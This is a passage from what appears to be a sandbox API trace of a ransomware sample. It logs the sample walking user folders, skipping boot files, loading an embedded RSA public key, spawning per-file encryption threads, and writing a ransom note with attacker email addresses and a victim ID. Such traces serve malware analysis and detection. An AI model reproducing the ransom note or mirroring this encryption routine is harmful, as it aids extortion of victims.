(hKey=0xe14) returned 0x0 [0202.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.373] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.373] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.373] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.373] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.373] PathFindFileNameW (pszPath="C:\\Users\\Default\\AppData") returned="AppData" [0202.373] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0202.374] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0202.374] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.374] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0202.374] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0202.374] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.374] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0202.374] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0202.374] SetErrorMode (uMode=0x1) returned 0x1 [0202.374] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0202.374] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0202.374] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Application Data\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0202.374] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*" [0202.374] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0202.374] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.374] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0202.374] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*" [0202.374] SetErrorMode (uMode=0x1) returned 0x1 [0202.374] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT") returned 55 [0202.375] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0202.375] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.375] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe14) returned 0x0 [0202.375] RegQueryValueExW (in: hKey=0xe14, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b9598, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b9598*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0202.375] RegCloseKey (hKey=0xe14) returned 0x0 [0202.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.375] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.375] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.375] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\application data\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.376] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0202.376] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.376] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.376] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0202.376] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0202.376] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.376] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0202.376] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0202.376] SetErrorMode (uMode=0x1) returned 0x1 [0202.376] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0202.376] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0202.376] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0202.376] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Contacts\\*.*") returned="C:\\Users\\Default\\Contacts\\*.*" [0202.376] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.376] PathFindFileNameW (pszPath="C:\\Users\\Default\\Contacts") returned="Contacts" [0202.377] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0202.377] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.377] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.377] lstrcmpW (lpString1="Administrator.contact", lpString2="..") returned 1 [0202.377] lstrcmpW (lpString1="Administrator.contact", lpString2=".") returned 1 [0202.377] StrStrW (lpFirst="Administrator.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0202.377] StrStrW (lpFirst="Administrator.contact", lpSrch="ntldr") returned 0x0 [0202.377] StrStrW (lpFirst="Administrator.contact", lpSrch="NTLDR") returned 0x0 [0202.377] StrStrW (lpFirst="Administrator.contact", lpSrch="NTDETECT.COM") returned 0x0 [0202.377] StrStrW (lpFirst="Administrator.contact", lpSrch="ntdetect.com") returned 0x0 [0202.377] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned 30 [0202.377] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Contacts\\") [0202.377] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.377] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0202.377] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0202.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe18 [0202.378] Sleep (dwMilliseconds=0x96) [0202.524] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.524] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0202.524] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0202.524] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0202.525] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0202.525] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0202.525] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0202.525] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0202.525] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned 30 [0202.525] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Contacts\\") [0202.525] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.525] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.525] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0202.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe1c [0202.525] Sleep (dwMilliseconds=0x96) [0202.680] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0202.680] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0202.681] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0202.681] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0202.681] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Contacts\\*.*") returned="C:\\Users\\Default\\Contacts\\*.*" [0202.681] SetErrorMode (uMode=0x1) returned 0x1 [0202.681] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT") returned 47 [0202.681] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0202.681] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.681] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe20) returned 0x0 [0202.681] RegQueryValueExW (in: hKey=0xe20, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b97c8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b97c8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0202.681] RegCloseKey (hKey=0xe20) returned 0x0 [0202.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.682] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.682] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.682] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.682] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.682] PathFindFileNameW (pszPath="C:\\Users\\Default\\Contacts") returned="Contacts" [0202.682] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0202.682] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0202.682] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0202.682] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.682] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0202.682] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.682] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0202.682] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0202.682] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0202.682] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0202.683] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.683] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0202.683] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0202.683] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.683] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0202.683] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0202.683] SetErrorMode (uMode=0x1) returned 0x1 [0202.683] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0202.683] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0202.683] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Cookies\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0202.683] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*" [0202.683] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0202.683] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.683] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0202.683] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*" [0202.683] SetErrorMode (uMode=0x1) returned 0x1 [0202.683] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT") returned 46 [0202.683] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0202.684] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.684] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe24) returned 0x0 [0202.684] RegQueryValueExW (in: hKey=0xe24, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b99f8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b99f8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0202.684] RegCloseKey (hKey=0xe24) returned 0x0 [0202.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.684] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.684] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.689] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.689] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0202.689] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.689] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.689] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0202.689] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0202.689] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.689] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0202.689] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0202.689] SetErrorMode (uMode=0x1) returned 0x1 [0202.689] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0202.689] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0202.690] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0202.690] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*" [0202.690] FindFirstFileW 